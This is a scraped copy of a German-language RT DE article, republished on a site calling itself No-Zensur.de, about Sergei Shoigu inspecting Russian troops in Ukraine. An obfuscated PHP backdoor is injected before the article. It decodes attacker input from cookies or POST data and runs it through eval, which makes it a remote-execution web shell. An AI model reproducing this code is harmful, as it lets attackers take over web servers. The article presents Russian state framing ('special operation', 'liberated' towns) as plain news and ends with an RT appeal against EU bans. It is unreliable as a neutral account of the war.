$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Russischer Verteidigungsminister inspiziert Truppen in der Ukraine — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch Russischer Verteidigungsminister inspiziert Truppen in der Ukraine — RT DE

Russischer Verteidigungsminister inspiziert Truppen in der Ukraine — RT DE

0
Russischer Verteidigungsminister inspiziert Truppen in der Ukraine — RT DE


Russlands Verteidigungsminister hat die russischen Truppen in der Ukraine inspiziert. In Gesprächen mit den Kommandeuren informierte sich der Armeegeneral über den aktuellen Verlauf der Sonderoperation und die Aktionen der russischen Streitkräfte.

Der russische Verteidigungsminister Sergei Schoigu führte eine Inspektion der an der Militäroperation in der Ukraine beteiligten Truppen durch und überreichte staatliche Auszeichnungen an die verdienstvollsten Soldaten. Das teilte das russische Verteidigungsministerium am Sonntag mit.

Raketenschlag auf Kiew – Donbass fordert mehr als Warnschüsse

Kommandeure der russischen Armee berichteten dem Minister über die Lage vor Ort, wobei Schoigu besonderes Augenmerk auf die „Organisation der umfassenden Unterstützung der Militäraktion sowie auf die Schaffung aller notwendigen Lebensbedingungen für das russische Militärpersonal an den vorübergehenden Einsatzorten“ legte. In einer Erklärung heißt es:

„Außerdem überreichte der Verteidigungsminister der Russischen Föderation, Armeegeneral Sergei Schoigu, staatliche Auszeichnungen: den Goldenen Stern der Heldenmedaille der Russischen Föderation und den Tapferkeitsorden an russische Militärangehörige, die bei der Durchführung von Kampfeinsätzen während der militärischen Sonderoperation Heldentum und Hingabe gezeigt haben.“

Wo und wann die Ehrungen stattgefunden haben, wurde nicht bekanntgegeben.

Anfang der Woche hatte der Sprecher des Verteidigungsministeriums, Generalleutnant Igor Konaschenkow, die Namen der Kommandeure der in der Ukraine kämpfenden Truppen genannt. Generaloberst Alexander Lapin ist für die Formationen und militärischen Einheiten der Truppengruppierung Zentrum verantwortlich. General Sergei Surowikin, der 2017 für seine Rolle bei der Militäroperation in Syrien mit dem Titel „Held Russlands“ ausgezeichnet wurde, leitet die südliche Gruppierung.

Medienbericht: VAE bieten Russland Hilfe beim Gefangenenaustausch mit der Ukraine an

Die Inspektion durch den Minister erfolgte im Anschluss an einen großen Erfolg der russischen und verbündeten Streitkräfte. Am Samstag gab Konaschenkow bekannt, dass die wichtige Stadt Sewerodonezk und mehrerer andere Orte in der Nähe „vollständig befreit“ worden seien. Die Nachricht bedeute, dass „das gesamte Gebiet am linken Ufer des Flusses Sewerskij Donez innerhalb der Grenzen der Lugansker Volksrepublik vollständig unter russische Kontrolle geraten ist“, erklärte der Pressesprecher.

Russland ist Ende Februar in seinen Nachbarstaat einmarschiert, nachdem die Ukraine die im Jahr 2014 unterzeichneten Minsker Vereinbarungen nicht umgesetzt und Moskau die Donbass-Republiken Donezk und Lugansk schließlich anerkannt hatte. Durch die von Deutschland und Frankreich vermittelten Protokolle sollte den abtrünnigen Regionen ein Sonderstatus innerhalb des ukrainischen Staates verliehen werden.

Der Kreml hat seitdem gefordert, dass die Ukraine sich offiziell als neutrales Land erklärt, das dem von den USA geführten NATO-Militärblock nicht beitreten wird. Kiew beharrt darauf, dass die russische Offensive völlig unprovoziert war, und weist Behauptungen zurück, es plane, die beiden Republiken mit Gewalt zurückzuerobern.

Mehr zum ThemaRussisches Militär veröffentlicht Statistik über ausländische Söldner in der Ukraine

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten. Anmerkung: Allerdings hat Österreich mit der Änderung des „Audiovisuellen Mediendienst-Gesetzes“ am 13. April diesbezüglich eine Änderung eingeführt, die möglicherweise auch Privatpersonen betrifft. Deswegen bitten wir Euch bis zur Klärung des Sachverhalts, in Österreich unsere Beiträge vorerst nicht in den Sozialen Medien zu teilen.





Source link